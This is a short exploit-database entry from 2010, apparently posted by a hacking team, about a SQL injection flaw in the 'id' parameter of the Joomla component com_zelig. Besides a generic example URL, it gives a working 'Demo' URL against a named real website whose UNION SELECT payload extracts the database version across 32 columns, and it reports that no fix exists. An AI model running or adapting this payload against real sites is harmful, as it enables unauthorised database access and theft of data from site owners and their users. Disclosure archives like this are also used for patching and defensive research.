Joomla Component com_zelig SQL Injection Vulnerability

2010-05-25 16:06:18

[x] Joomla Component Zelig
[x] Date: 16/05/2010
[x] Author: s4r4d0
[x] Contact: [email protected]
[x] Team: Fatal Error
[x] Bug: Sql Injection on Component Zelig (id)
[x] Example: http://www.site.com/index.php?option=com_zelig&view=person&id=[Sql Injection]
[x] Demo:http://www.zeligfilm.it/index.php?option=com_zelig&view=person&id=-1+UNION+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
[x] Made in Brazil

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.